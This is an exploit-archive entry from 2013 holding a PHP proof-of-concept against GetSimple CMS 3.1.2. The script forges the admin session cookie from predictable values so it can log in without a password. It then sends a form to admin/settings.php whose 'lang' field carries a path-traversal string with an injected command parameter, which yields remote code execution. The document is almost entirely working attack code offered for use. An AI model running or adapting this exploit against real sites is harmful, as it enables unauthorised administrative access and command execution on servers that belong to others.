GetSimple 3.1.2 Code Execution



EKU-ID: 2944 CVE: OSVDB-ID:
Author: Jakub Galczyk Published: 2013-01-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<?php
	// --------------------------------
	// iHaiHa-vs-hosting2rce.php	
	// --------------------------------
	// 26.12.2o12
	// 
	// Specjal thanks to ihaiha team for 
	// 'point of view'. 
	// 


// cookie() grepped from GetSimple 3.1.2, THANKS! ;]
// just for 'knowing the cookie'.
function create_cookie() {
	global $USR,$SALT,$cookie_time,$cookie_name; 
	$saltUSR = $USR.$SALT;
	$saltCOOKIE = sha1($cookie_name.$SALT);
	setcookie($saltCOOKIE, sha1($saltUSR), time() + $cookie_time,'/');
	setcookie('GS_ADMIN_USERNAME', $USR, time() + $cookie_time,'/');
}


// get-IT-simple-ihaiha-kod-yeah
function getsimple_cookie(){

	// potrzebujemy:
	$authenticated = true;
	$USR = 'admin'; //$_POST['userid']; // admin?
	$ver_no_clean = '3.1.2';
	$SITEURL = '/your/GetSimple_3.1.2/admin/settings.php'; //$_POST['siteurl'];
	$SALT = sha1($SITEURL);
	$cookie_time = '7200';

	$site_full_name = 'GetSimple';
	$name_url_clean = strtolower(str_replace(' ','-',$site_full_name));
	$cookie_name = strtolower($name_url_clean) .'_cookie_'. $ver_no_clean;

	echo 'It should be interesting that we can (re)generate valid cookie<br>';
	echo 'and login without password, right? <br><br><b>Generated cookie:  ';
	echo $cookie_name . '<br></b>';
	echo '<br>Anyway: this simple code exploits vulnerability in :<br>';
	echo '<b>admin/settings.php</b>:';

	
	if( $authenticated ) {
                # YES - set the login cookie, then redirect user to secure panel 
//              create_cookie();
		setcookie('GS_ADMIN_USERNAME', $USR, time() + 3600,'/');
	
		echo '<form method="post" action="'. $SITEURL .'">';
		echo '<input type="hidden" name="username" value="' . $USR . '">';
		echo '<input type="hidden" name="pwd" value="ihaihaiha">'; // sample; as a hardcoded (wrong anyway) pass
		echo '<input type="hidden" name="lang" value="en_US/../../../../../../../../../../tmp/&cmd='.$_POST['cmd'].'">';
		echo '<br>So add come cmd: <br>';
		echo 'cmd: <input type="text" name="cmd">';
		echo '<input type="submit" value="teraz">';
	} else {
		echo 'Nope. :C';
	}



} // end of getsimple_cookie()

getsimple_cookie();